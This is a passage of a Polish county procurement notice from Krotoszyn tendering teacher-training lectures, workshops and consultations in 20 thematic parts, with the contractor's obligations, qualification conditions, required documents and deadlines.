dydaktyczne, opis przebiegu zajęć, oczekiwane rezultaty zgodnie z oczekiwaniami uczestników zawartymi w opisie oferty. Zamawiający w przeciągu 7 dni kalendarzowych zaakceptuje przedstawiony szczegółowy scenariusz zajęć lub zgłosi do niego uwagi i propozycje zmian. W przypadku uwag i/lub propozycji zmian wykonawca zobowiązany jest do ich uwzględnienia i przekazania poprawionego szczegółowego scenariusza zajęć w terminie 3 dni kalendarzowych od dnia zgłoszenia przez Zamawiającego uwagi i/lub propozycji zmian. Poprawiony szczegółowy scenariusz zajęć podlega zatwierdzeniu przez Zamawiającego w terminie 5 dni kalendarzowych od dnia jego przekazania. Zaakceptowane przez Zamawiającego scenariusze zajęć będą stanowić podstawę pracy wszystkich trenerów przeprowadzających szkolenia,Po stronie Wykonawcy leży  przygotowanie materiałów szkoleniowych dla uczestników szkoleń i przesłanie drogą mailową w 1 egzemplarzu zamawiającemu najpóźniej  na 7 dni kalendarzowych  przed realizacją szkolenia. Powielanie materiałów szkoleniowych przeznaczonych dla uczestników szkoleń leży po stronie Zamawiającego,Wykonawca przygotuje wzory ankiet ewaluacyjnych i zaświadczeń ukończenia szkolenia lub uczestnictwa w szkoleniu według uzgodnień z zamawiającym. W ciągu 7 dni kalendarzowych od daty zawarcia umowy Wykonawca przygotuje ankiety oceniające szkolenie, dotyczące oceny przez uczestników takich elementów jak:scenariusz zajęć i metody szkoleniowe, zdobycie nowej wiedzy przez uczestnika, przydatność  szkolenia, zgodność materiałów szkoleniowych ze szczegółowym programem zajęć. Druk ankiet ewaluacyjnych i zaświadczeń dla uczestników leży po stronie Zamawiającego,  konsultacje ze wskazanym przez koordynatora projektu SORE  w zakresie treści merytorycznych i ustalenia konkretnej daty szkolenia w danej placówce.Realizacja doskonalenia w poszczególnych placówkach: Wykonawca zobowiązany jest do realizacji szkoleń (wykładów, warsztatów) oraz konsultacji grupowych zgodnie z podanym harmonogramem, określonym w pkt. 5  Terminy realizacji poszczególnych form doskonaleniaWykonawca konsultował będzie  z SORE daty realizacji szkoleń i konsultacji grupowych   szkolenia i konsultacje grupowe mogą odbywać się od poniedziałku do piątku (w godzinach popołudniowych) w  soboty od godzin rannych  (z wyłączeniem dni ustawowo wolnych od pracy),Wykonawca przygotuje informację z  przeprowadzonej ewaluacji  i prześle zamawiającemu w następujących terminachI etap  tydzień po zakończeniu pierwszej tury warsztatów,II etap - tydzień po zakończeniu II tury warsztatówZespół Trenerów realizujących poszczególne oferty:Trenerzy prowadzący szkolenia muszą posiadać (każdy osobno):formalne przygotowanie do pracy trenera (posiadać dokumenty potwierdzające umiejętności trenerskie np. certyfikat trenera lub zaświadczenie o ukończeniu szkoły/studiów podyplomowych z zakresu umiejętności trenerskich),wypracowane co najmniej 100 udokumentowanych godzin szkoleniowych realizowanych dla pracujących osób dorosłych z zakresu różnych form doskonalenia nauczycieli oraz  wypracowane co najmniej  doświadczenie w prowadzeniu  szkoleń dla pracowników oświaty  wysoko ocenianych przez uczestników oraz doświadczenie w praktycznym zastosowaniu treści,  z zakresu których przeprowadza szkolenie,Wykonawca powinien zabezpieczyć merytoryczną realizację spotkań na najwyższym poziomie dla  grupy odbiorców, jaką stanowią nauczyciele. Wykonawca ponosi odpowiedzialność za merytoryczną realizację wykładów, warsztatów i konsultacji.Miejsce przeprowadzenia doskonalenia   placówki z terenu powiatu krotoszyńskiego Zasady ogólne współpracyWszystkie materiały powstające w ramach realizacji Zadania wymagają akceptacji Zamawiającego.Materiały przekazane Zamawiającemu przez Wykonawcę do akceptacji, Zamawiający zaakceptuje lub zwróci Wykonawcy z uwagami w ciągu 5 dni roboczych od ich otrzymania.W przypadku zgłoszenia uwag, Wykonawca zobowiązuje się do ich uwzględnienia i przekazania poprawionej wersji w terminie 3 dni roboczych. Po tej procedurze, ponowne przekazanie przez Wykonawcę propozycji niepoprawionej lub niezgodnej z uwagami Zamawiającego zostanie uznane jako niewykonanie danego elementu Zadania. Cele doskonalenia/zakładane rezultaty:wykłady  nauczyciele uzyskują wiedzę w zakresie danej oferty tematycznej zgodnie z jej opisem warsztaty  nauczyciele nabywają/rozwijają umiejętności w zakresie danej oferty tematycznej zgodnie z jej opisemkonsultacje grupowe  nauczyciele korzystają z wiedzy i doświadczenia ekspertów na etapie wdrażania wiedzy i umiejętności nabytych w trakcie doskonalenia (wykładów i warsztatów) do pragmatyki szkolnej.Wykonawca zobowiązany jest sporządzić i przeprowadzić kwestionariusz (test) badający kompetencje przed i po szkoleniu (na wejściu i na wyjściu), ankietę ewaluacyjną na zakończenie szkolenia, Wykonawca jest zobowiązany przekazać Zamawiającemu (tzn. SORE) bezpośrednio po formie doskonalenia, a najpóźniej w ciągu 5 dni roboczych od zakończenia  doskonalenia oryginały dokumentów, o których mowa w powyższym  ppkt..Sale i pracownie przewidziane na realizację wsparcia eksperckiego (wykładu/warsztatu/ konsultacji grupowej) w danej placówce, szkole/ przedszkolu lub innym uzgodnionym miejscu Zamawiający udostępni Wykonawcy nieodpłatnie. Materiały biurowe dla uczestników wykładów, warsztatu/spotkania grupowego zapewnia Zamawiający..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 20.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku dokonana zostanie  na podstawie złożonego oświadczenia na  zasadzie spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, iż   w okresie ostatnich trzech lat przed upływem  terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał-przeprowadził (a w przypadku świadczeń okresowych lub ciągłych  również wykonywanych) minimum pięć głównych usług polegających na przeprowadzeniu szkoleń lub warsztatów  dla pracujących osób dorosłych z zakresu różnych form doskonalenia nauczycieli, których wartość razem wyniosła min 5.000,00 zł brutto.  Wykaz  winien zawierać również  wartości zrealizowanych szkoleń lub warsztatów, dat wykonania i podmiotów  na rzecz których usługi zostały wykonane oraz załączenie dowodów czy  zostały wykonane  lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku dokonana zostanie  na podstawie złożonego oświadczenia na zasadzie spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku dokonana zostanie  na podstawie złożonego oświadczenia na zasadzie spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku dokonana zostanie  na podstawie złożonego oświadczenia na zasadzie spełnia-nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony formularz ofertowy
W przypadku osób fizycznych nie prowadzących działalności gospodarczej, zamiast dokumentów - aktualnego odpisu z właściwego rejestru lub centralnej ewidencji i informacji  o działalności gospodarczej (o których mowa powyżej) - Wykonawca  winien złożyć oświadczenie  o niepodleganiu wykluczeniu z postępowania na podstawie art. 24 ust. 1 pkt. 2 ustawy Prawo zamówień publicznych</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiany umowy wymagają formy pisemnej pod rygorem nieważności
2.	Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, w przypadku wystąpienia, co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:
a)	Zamawiający przewiduje możliwość zmiany sposobu spełnienia świadczenia w następujący sposób:    Dopuszcza się zmianę osoby,  dodanie kolejnych osób do realizacji zamówienia  przez Wykonawcę. W takim przypadku, Wykonawca do realizacji przedmiotu zamówienia zapewnia  osoby posiadające    kwalifikacje i doświadczenie nie mniejsze niż określone w warunkach udziału   w postępowaniu,
b)	Zmiana miejsca świadczenia usługi w przypadku, gdy Zamawiający nie będzie mógł z przyczyn losowych zapewnić miejsca wykonania przedmiotu zamówienia wskazanego w umowie z przyczyn od siebie niezależnych, a jednocześnie będzie miał możliwość zapewnienia innego miejsca świadczenia usługi, w podobnych standardach.
3.	Umowa może ulec zmianie również w przypadku  zmiany terminu realizacji umowy  z uwagi na działanie siły wyższej. 
4.	Dla potrzeb Umowy siła wyższa oznacza zdarzenie pozostające poza kontrolą Wykonawcy, występujące po podpisaniu Umowy przez obie Strony, przeszkadzające racjonalnemu wykonaniu przez Wykonawcę obowiązków, nie obejmujące winy własnej lub nienależytej staranności 

Wykonawcy lub osób, którymi się posłużył przy wykonywaniu umowy i nieprzewidywalne w dacie zawarcia niniejszej Umowy ani też niemożliwe do zapobieżenia. 
5.	Jeżeli siła wyższa spowoduje niewykonanie lub nienależyte wykonanie zobowiązań wynikających z Umowy: 
a)	Wykonawca , który nie wykonał lub nienależycie wykonał swoje zobowiązania ze względu na działanie siły wyższej, zawiadomi w terminie 2 dni, na piśmie Zamawiającego o powstaniu i przewidywanym zakończeniu tego zdarzenia, przedstawiając stosowną dokumentację uzasadniającą w tym zakresie; 
b)	Jeżeli Zamawiający  uzna argumentację  Wykonawcy, o której mowa w ust. 3 a,  za uzasadnioną sporządzi stosowny aneks do umowy.
9.	Strona przystąpi do dalszego wykonywania Umowy niezwłocznie po zakończeniu działania siły wyższej</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://powiat krotoszyn.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> http://powiat krotoszyn.bip.net.pl 
lub
Starostwo Powiatowe w Krotoszynie
ul. 56 Pułku Piechoty Wlkp. 10
63-700 Krotoszyn.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.10.2013 godzina 09:00, miejsce: Starostwo Powiatowe w Krotoszynie
ul. 56 Pułku Piechoty Wlkp. 10
63-700 Krotoszyn
pok. 25.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Postępowanie realizowane jest w ramach projektu Wdrożenie modelu doskonalenia nauczycieli i kompleksowego wsparcia szkół  i przedszkoli w powiecie krotoszyńskim   (nr WND POKL.03.05.00-00-157/12) realizowany w ramach Programu Operacyjnego Kapitał Ludzki,  Priorytet: III. Wysoka jakość systemu oświaty, Działanie: 3.5. Kompleksowe wspomaganie rozwoju szkół..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1
 Techniki uczenia się i metody motywujące do nauki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 1
 Techniki uczenia się i metody motywujące do nauki 
wykłady 6 godzin, warsztaty 15 godzin, konsultacje grupowe 6 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2

Techniki uczenia się i metody motywujące  do nauki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 2

Techniki uczenia się i metody motywujące  do nauki 
	Odbiorcy - nauczyciele szkoły podstawowej

wykłady 6 godzin, warsztaty 15 godzin, konsultacje grupowe 6 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3

Techniki uczenia się i metody motywujące do nauki..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 3

Techniki uczenia się i metody motywujące do nauki.
Odbiorcy - nauczyciele szkoły podstawowej
wykłady 6 godzin, warsztaty 15 godzin, konsultacje grupowe 6 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie 4

Techniki uczenia się i metody motywujące do nauki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 4

Techniki uczenia się i metody motywujące do nauki
      Odbiorcy - nauczyciele szkoły podstawowej
wykłady 6 godzin, warsztaty 15 godzin, konsultacje grupowe 6 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie 5

Techniki uczenia się i metody motywujące do nauki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 5

Techniki uczenia się i metody motywujące do nauki
     Odbiorcy  - nauczyciele gimnazjum
wykłady 6 godzin, warsztaty 15 godzin, konsultacje grupowe 6 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie 6

Rodzice są partnerami szkoły.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 6

Rodzice są partnerami szkoły
      Odbiorcy - nauczyciele szkoły podstawowej
wykłady 6 godzin, warsztaty 15 godzin, konsultacje grupowe 6 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie 7


Rodzice są partnerami szkoły.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 7


Rodzice są partnerami szkoły 
 Odbiorcy - nauczyciele szkoły podstawowej
wykłady 6 godzin, warsztaty 15 godzin, konsultacje grupowe 6 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie 8

Rodzice są partnerami szkoły.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 8

Rodzice są partnerami szkoły
Odbiorcy - nauczyciele liceum ogólnokształcącego
wykłady 6 godzin, warsztaty 15 godzin, konsultacje grupowe 6 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie 9

 Jak i po co prowadzić ewaluację wewnętrzną.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 9

 Jak i po co prowadzić ewaluację wewnętrzną
 Odbiorcy- nauczyciele przedszkola
wykłady 6 godzin, warsztaty 15 godzin, konsultacje grupowe 6 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zadanie 10

 Nauczyciel 45+.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 10

 Nauczyciel 45+ 
 Odbiorca - nauczyciele przedszkola
wykłady 6 godzin, warsztaty 15 godzin, konsultacje grupowe 6 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zadanie 11

 Nauczyciel 45+.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 11

 Nauczyciel 45+
 Odbiorcy - nauczyciele liceum ogólnokształcącego
wykłady 6 godzin, warsztaty 15 godzin, konsultacje grupowe 6 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zadanie 12

Efektywna organizacja pracy zespołów nauczycielskich.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 12

Efektywna organizacja pracy zespołów nauczycielskich  
 Odbiorcy - nauczyciele liceum ogólnokształcącego
wykłady 6 godzin, warsztaty 15 godzin, konsultacje grupowe 6 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Zadanie 13

Ocenianie kształtujące.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 13

Ocenianie kształtujące 
Odbiorcy - nauczyciele gimnazjum.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Zadanie  14

 Budowa koncepcji pracy przedszkola..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie  14

 Budowa koncepcji pracy przedszkola.
 Odbiorcy - nauczyciele przedszkola
wykłady 6 godzin, warsztaty 15 godzin, konsultacje grupowe 6 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Zadanie 15
Jak pomóc uczniowi osiągnąć sukces edukacyjny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 15
Jak pomóc uczniowi osiągnąć sukces edukacyjny
Odbiorcy - nauczyciele szkoły podstawowej
wykłady 6 godzin, warsztaty 15 godzin, konsultacje grupowe 6 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Zadanie  16

Jak pomóc uczniowi osiągnąć sukces edukacyjny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie  16

Jak pomóc uczniowi osiągnąć sukces edukacyjny
 Odbiorcy - nauczyciele szkoły podstawowej
wykłady 6 godzin, warsztaty 15 godzin, konsultacje grupowe 6 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Zadanie 17

Jak pomóc uczniowi osiągnąć sukces edukacyjny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 17

Jak pomóc uczniowi osiągnąć sukces edukacyjny
 Odbiorcy - nauczyciele gimnazjum
wykłady 6 godzin, warsztaty 15 godzin, konsultacje grupowe 6 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Zadanie 18

Oferta edukacyjna drogą do właściwej realizacji podstawy programowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 18

Oferta edukacyjna drogą do właściwej realizacji podstawy programowej
Odbiorcy nauczyciele przedszkola
wykłady 6 godzin, warsztaty 15 godzin, konsultacje grupowe 6 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Zadanie 19

Postawy uczniowskie. Jak je kształtować?.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 19

Postawy uczniowskie. Jak je kształtować?
 Odbiorcy - nauczyciele szkoły podstawowej
wykłady 6 godzin, warsztaty 15 godzin, konsultacje grupowe 6 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Zadanie 20

Szkoła promuje wartość edukacji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 20

Szkoła promuje wartość edukacji
Odbiorcy - nauczyciele liceum ogólnokształcącego
wykłady 6 godzin, warsztaty 15 godzin, konsultacje grupowe 6 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
